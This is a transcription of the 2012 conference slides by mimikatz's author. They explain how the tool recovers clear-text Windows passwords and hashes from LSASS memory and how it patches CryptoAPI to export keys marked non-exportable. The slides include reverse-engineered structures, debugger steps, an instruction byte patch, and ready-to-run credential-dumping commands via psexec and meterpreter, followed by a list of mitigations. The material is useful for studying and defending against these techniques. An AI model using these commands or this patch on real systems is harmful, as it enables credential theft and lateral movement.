Read about mimikatz and how it works


mimikatz
Benjamin DELPY `gentilkiwi`
focus on sekurlsa / pass-the-pass and crypto patches
Who ? Why ?
Benjamin DELPY `gentilkiwi`
– French
– 26y
– Kiwi addict
– Lazy programmer
Started to code mimikatz to :
– explain security concepts ;
– improve my knowledge ;
– prove to Microsoft that sometimes they must change old habits.
Why all in French ?
– because I’m
– It limits script kiddies usage
– Hack with class
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
2
mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0
Everywhere ; it’s statically compiled
Two modes
– direct action (local commands)
– process or driver communication
[Diagram : mimikatz.exe and the services it talks to]
– KeyIso « Isolation de clé CNG » (CNG Key Isolation) in LSASS.EXE
  Direct action : crypto::patchcng
– EventLog « Journal d’événements Windows » (Windows Event Log) in SVCHOST.EXE
  Direct action : divers::eventdrop
– SamSS « Gestionnaire de comptes de sécurité » (Security Accounts Manager) in LSASS.EXE
  Process communication : VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... inject sekurlsa.dll, which :
  • opens a pipe
  • writes a welcome message
  • waits for commands… and returns results
mimikatz
architecture of sekurlsa & crypto
[Diagram : mimikatz.exe, its modules and helper binaries]
mimikatz.exe command modules :
– mod_mimikatz_standard
– mod_mimikatz_winmine
– mod_mimikatz_divers
– mod_mimikatz_nogpo
– mod_mimikatz_impersonate
– mod_mimikatz_crypto
– mod_mimikatz_inject
– mod_mimikatz_samdump
– mod_mimikatz_handle
– mod_mimikatz_privilege
– mod_mimikatz_system
– mod_mimikatz_service
– mod_mimikatz_sekurlsa (msv_1_0, tspkg, wdigest, livessp, kerberos)
– mod_mimikatz_process
– mod_mimikatz_thread
– mod_mimikatz_terminalserver
Shared modules :
– mod_parseur, mod_text, mod_memory, mod_cryptoapi, mod_secacl, mod_pipe, mod_cryptoacng, mod_inject, mod_hive, mod_patch, mod_privilege, mod_system, mod_service, mod_process, mod_thread, mod_crypto, mod_ts
Helper binaries :
– mimikatz.sys (driver communication)
– kappfree.dll, kelloworld.dll, klock.dll
– sekurlsa.dll (process communication, in LSASS) : sam, msv_1_0, tspkg, wdigest, livessp, kerberos → secrets
mimikatz :: sekurlsa
mod_mimikatz_sekurlsa
what is it ?
A module replacement for my previous favorite library !
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump :
– MSV1_0 : hashes
– TsPkg : passwords
– Wdigest : passwords
– LiveSSP : passwords
– Kerberos : passwords (!)
– …?
mimikatz :: sekurlsa
how LSA works (PLAYSKOOL level)
[Diagram : Authentication. WinLogon hands user:domain:password to LsaSS, which passes it to the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos) ; msv1_0 works against the SAM, kerberos against the KDC, both by Challenge / Response]
mimikatz :: sekurlsa
how LSA works (PLAYSKOOL level)
Authentication packages :
– take user’s credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get this data and inject it into another LSASS session, we avoid the authentication part
This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »
mimikatz :: sekurlsa
history of « pass-the-* » 1/2
Pass-the-hash
– 1997 - Unix modified SAMBA client for hashes usage ; Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity)
– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) presents msvctl and provides some downloads of it
– 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))
2007 was the year of pass the hash !
Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support ; Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa
history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all ! (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg
what is it ?
Microsoft introduced SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users’ experience
– http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (!= Account delegation)
– Specs : http://download.microsoft.com/download/9/5/e/95ef66af9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression : it seems cool
– User does not have to type its password
– Password is not in RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg
questions ?
KB says that for it to work, we must enable « Default credentials » delegation
– “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
  • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
– In all cases, system seems to be vulnerable to pass-the-*…
In what form ?
Our specs : [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
– Challenge / response for authentication ?
  • Server : YES (TLS / Kerberos)
  • Client : NO ; *password* is sent to server…
So password resides somewhere in memory ?
mimikatz :: sekurlsa :: tspkg
symbols & theory
Let’s explore some symbols !
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
– sounds cool… (thanks Microsoft)
Let’s imagine a scenario
– Enumerate all sessions to obtain :
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with LUID to obtain :
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
mimikatz :: sekurlsa :: tspkg
workflow
LsaEnumerateLogonSessions → for each LUID → tspkg!TSGlobalCredTable → RtlLookupElementGenericTableAvl → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !
/* KIWI_TS_PRIMARY_CREDENTIAL is declared first so that the pointer in KIWI_TS_CREDENTIAL resolves */
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;  /* key used for the AVL table lookup */
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg
demo time !
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest
what is it ?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios :
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP”
Microsoft : http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory ; hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest
what is it ?
We speak about hashes, but what hashes ?
H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change… realm is from server side
and cannot be determined before Windows logon
WDigest provider must have elements to compute responses
for different servers :
– Username
– Realm (from server)
– Password
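As an added example (not from the slides), the RFC 2617 Digest computation in Python, with the values of the RFC's own worked example. It shows the asymmetry the slide relies on: the server only needs HA1 for its own realm, but a client that must answer servers it has never seen cannot precompute HA1, because the realm is chosen by each server; the second realm used below is a constructed value.

```python
# Added example, not part of the original slides. Values for the first
# realm come from the RFC 2617 section 3.5 example; "other.example" is constructed.
import hashlib
import hmac


def _md5(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is supplied by the server."""
    return _md5(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) (qop=auth form, no entity-body hash)."""
    return _md5(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, method: str, digest_uri: str,
                      nc: str = None, cnonce: str = None, qop: str = None) -> str:
    """H = MD5(HA1:nonce:[nc:cnonce:qop:]HA2); the bracketed part is present
    when the server offered a qop (RFC 2617), absent in the RFC 2069 form."""
    h2 = ha2(method, digest_uri)
    if qop:
        return _md5(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")
    return _md5(f"{h1}:{nonce}:{h2}")


def client_response(username, realm, password, nonce, method, digest_uri,
                    nc=None, cnonce=None, qop=None) -> str:
    """What the client sends: it needs the clear password (or an HA1 for this
    exact realm) when the challenge arrives."""
    return response_from_ha1(ha1(username, realm, password), nonce, method,
                             digest_uri, nc, cnonce, qop)


def server_verify(stored_ha1, nonce, method, digest_uri, response,
                  nc=None, cnonce=None, qop=None) -> bool:
    """The server side needs only HA1 for its own realm, never the password."""
    expected = response_from_ha1(stored_ha1, nonce, method, digest_uri, nc, cnonce, qop)
    return hmac.compare_digest(expected, response)


def ha1_is_realm_specific(username, password, realm_a, realm_b) -> bool:
    """True when two realms give different HA1 values, i.e. an HA1 cached for
    one server is useless for another; only the password works everywhere."""
    return ha1(username, realm_a, password) != ha1(username, realm_b, password)


if __name__ == "__main__":
    resp = client_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET", "/dir/index.html",
                           nc="00000001", cnonce="0a4f113b", qop="auth")
    print(resp)  # 6629fae49393a05397450978507c4ef1
    print(ha1_is_realm_specific("Mufasa", "Circle Of Life",
                                "testrealm@host.com", "other.example"))  # True
```

This is exactly the design tension the next slide describes: a server can store the per-realm HA1 instead of a reversible password, but a client-side provider that wants to give SSO for arbitrary realms has to keep something equivalent to the password.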
mimikatz :: sekurlsa :: wdigest
theory
This time, we know :
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let’s search for it in WDigest :
  .text:7409D151 _DigestCalcHA1@8          call    dword ptr [eax+0B4h]
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let’s search for it in WDigest :
  .text:74096C69 _SpAcceptCredentials@16   call    dword ptr [eax+0B0h]
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in a doubly linked list : wdigest!l_LogSessList
mimikatz :: sekurlsa :: wdigest
workflow
LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList → search linked list for LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear !
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;  /* matched against the enumerated LUID */
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
    /* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest
demo time !
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp
how
Actually I’ve only used a logical (empirical) approach to search for passwords… :
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time : make a WinDBG trap !
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g
mimikatz :: sekurlsa :: livessp
how
Let’s login with a Live account on Windows 8 !
Our LiveSSP provider :
  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2
  livessp!SpiLogonUserEx2
Yeah, Pass the Hash capability with Live account too… :
  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials
Live user can logon through RDP via SSO :
  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
mimikatz :: sekurlsa :: livessp
workflow
LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search linked list for LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !
/* KIWI_LIVESSP_PRIMARY_CREDENTIAL is declared first so that the pointer in KIWI_LIVESSP_LIST_ENTRY resolves */
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;  /* matched against the enumerated LUID */
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*
* Me, yes
mimikatz :: sekurlsa :: kerberos
Let’s login normal account
Kerberos, ticket part ? Maybe ;)
  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials
Kerberos part for password ??????
  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials
msv1_0 :
  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials
wdigest :
  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials
tspkg :
  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials
After credentials protection, KerbCreateLogonSession calls :
– NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList
mimikatz :: sekurlsa :: kerberos (nt6)
workflow
LsaEnumerateLogonSessions → for each LUID → kerberos!KerbGlobalLogonSessionTable → RtlLookupElementGenericTableAvl → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;  /* key used for the AVL table lookup */
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5)
workflow
LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search linked list for LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear !
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;  /* matched against the enumerated LUID */
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa
demo time !
Final sekurlsa demo sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos
“hu ?”
Ok It works…*
But why ?
* Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft’s implementation of Kerberos is full of logical…
– For password auth :
  • password hash for shared secret, but keeping password in memory
– For full smartcard auth :
  • No password on client
  • No hash on client ?
    – NTLM hash on client…
    – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way so they can be used
We used LsaUnprotectMemory, in the LSASS context, to decrypt them
LsaUnprotectMemory
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process ?
– Yes, it is… no more injection, just reading memory of LSASS process…
mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys
– When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS !
mimikatz :: sekurlsa
LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses :
– RC4
  lsasrv!g_cbRandomKey : DWORD ; 256
  lsasrv!g_pRandomKey  : @BYTE[g_cbRandomKey] → BYTE[g_cbRandomKey]
– DESx
  lsasrv!g_pDESXKey    : @BYTE[144] → BYTE[144]
  lsasrv!g_Feedback    : BYTE[8]
[Diagram : each key is read from lsasrv in the lsass process and copied… into the lsasrv loaded by mimikatz]
mimikatz :: sekurlsa
LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses :
– 3DES : lsasrv!h3DesKey
– AES  : lsasrv!hAesKey
with lsasrv!InitializationVector : BYTE[16]
[Diagram : the key handles and the IV are read from lsasrv in the lsass process and copied… into the lsasrv loaded by mimikatz]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc... */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa
memo
Security Packages
Package         | Symbols                               | Type
tspkg           | tspkg!TSGlobalCredTable               | RTL_AVL_TABLE
wdigest         | wdigest!l_LogSessList                 | LIST_ENTRY
livessp         | livessp!LiveGlobalLogonSessionList    | LIST_ENTRY
kerberos (nt5)  | kerberos!KerbLogonSessionList         | LIST_ENTRY
kerberos (nt6)  | kerberos!KerbGlobalLogonSessionTable  | RTL_AVL_TABLE
msv1_0          | lsasrv!LogonSessionList               | LIST_ENTRY
                | lsasrv!LogonSessionListCount          | ULONG
Protection Keys
Key NT 5  | Symbols
RC4       | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx      | lsasrv!g_pDESXKey, lsasrv!g_Feedback
Key NT 6  | Symbols
3DES      | lsasrv!h3DesKey
AES       | lsasrv!hAesKey
(IV)      | lsasrv!InitializationVector
mimikatz :: sekurlsa
memo
Some commands :
– mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
– psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
– meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        livessp :
         n.t. (LUID KO)
mimikatz :: sekurlsa
what we can do ?
Basics
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke ; so useless !!!)
– For privileged account, network login instead of interactive (when possible)
– Audit ; pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even VIP
– Use separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) : $ / €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic :
  • biometrics (it keeps password somewhere and push it to Windows)
  • single sign on
– Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers ?
  • Is it supported by Microsoft ?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?
mimikatz :: crypto
mod_mimikatz_crypto
what is it ?
A little module that I wrote to :
– play with Windows Cryptographic API / CNG and RSA keys
– automate export of certificates/keys
  • Even those which are “not” exportable
What crypto module can do :
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public in DER format
    – with private keys in PFX format
  • Private keys in PVK format
    – it’s cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again !)
mimikatz :: crypto
how it’s protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)
– Yes, a computer/server opens a “session”
Export/Usage can be limited by :
– Password
  • Constraint for most users
  • Unavailable for computer keys
– Popup
– Export/Archive flag not present
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi
how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi
how it’s exported (PLAYSKOOL level)
[Diagram : Process → CryptoAPI and RSA CSP → Load Private Key (DPAPI Decode) → Ask to export Key → Exportable ? → yes : Exported Key / no : NTE_BAD_KEY_STATE]
mimikatz :: crypto :: patchcapi
because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable (Exportable ?)
certutil :
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
mimikatz :: crypto :: patchcapi
because I own my process
So what ? A module in my own process returns that I can’t do something ?
CryptoAPI is in my memory space, let’s patch it !
Before :
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
After :
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive
Before :
.text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
After :
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
I wrote “4” bytes in my memory space
mimikatz :: crypto :: patchcapi
demo time !
Import, export, import as not exportable…. export
mimikatz :: crypto :: patchcapi
limitations
Because :
– I’m lazy
– I’ve seen in the majority of cases RSA keys for real life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with :
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng
how it works
